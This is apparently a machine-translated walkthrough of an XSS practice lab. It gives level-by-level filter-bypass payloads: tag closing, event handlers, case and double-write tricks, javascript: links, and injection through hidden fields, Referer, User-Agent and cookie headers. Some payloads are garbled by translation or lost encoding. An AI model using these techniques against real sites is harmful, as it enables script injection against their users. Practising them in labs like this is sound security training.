Web security XSS foundation 06

The first level

The second level

input Property value of label value in , closed ">, structure payload

"><script>alert(123)<script>

The third level

View page source code , Need to close Single quotation marks and >

structure payload：

'><script>alert(1)</script>

Find out <> It's materialized

payload:

' οnmοuseοver='alert(123)'
' οnmοusemοve='alert(123)'

The fourth level

<> The filtered

structure payload：

" οnmοusemοve="alert(123)

The fifth level

payload:

">123acada<script>alert(1)</script>

Find out script A bar was added in the middle

Try mouse events ：

" onmousemove='alert(123)'

Still added _

Try js Fake protocol
Is the use of a Labeled href To run the javascript Methods
there script Not filtered ！

"> <a href=javascript:alert('xss') > xss</a> 

The sixth level

script,on start , as well as href It's all restricted
At this point, it suddenly occurred to me that case bypass ........... The previous ones should be able to do the same ：
payload：

"><ScRipt>alert(1)</script>

The seventh level

script Filtered ！

Try double write bypass ：
payload:

"><scscriptript>alert(1)</scscriptript>

The eighth level

You can add links ,enmm Try JAVASCRIPT Fake protocol

javascript:alert(1)

Limited
Try case ：

javaScRipt:alert(1)

Still can't get around .
Try encoding to bypass ：

javascript:alert(1)

Put... Directly scirpt Turn into substance script
payload:

javascript:alert(1)

The Ninth level

The Ninth level is one more judgment than the eighth level , Determine whether the link is legal

if(false===strpos($str7,'http://'))
 
{
    
 
  echo '<center><BR><a href=" Your link is illegal ？ Is there any ！"> link </a></center>';
 
 }

payload：

javascript:alert('http://xss')

The tenth level

No clue , Looking at the source code, you will find that there are three input label , It seems to be through t_sort To pass parameters , But the labels are hidden , We can only construct our own buttons , Triggering event

payload：

&t_sort="123" type="text" onclick="alert('xss')

The eleventh level

View the source code ：
Found one more $str11=$_SERVER['HTTP_REFERER'];
referer The ginseng

It seems that you need to add referer head , The added value is passed in t_ref in

structure payload1：
Create a button , Click to trigger xss

referer: click me!" type="button" οnclick="alert(xss)

payload2：
Create a text box , Move the mouse to trigger xss

referer:123" type="text" οnmοuseοver="alert('123')

Pass 12

UA Just inject it at , structure payload：

click me!" type="button" οnclick="alert('xss')

Level 13

cookie Injection at
payload ditto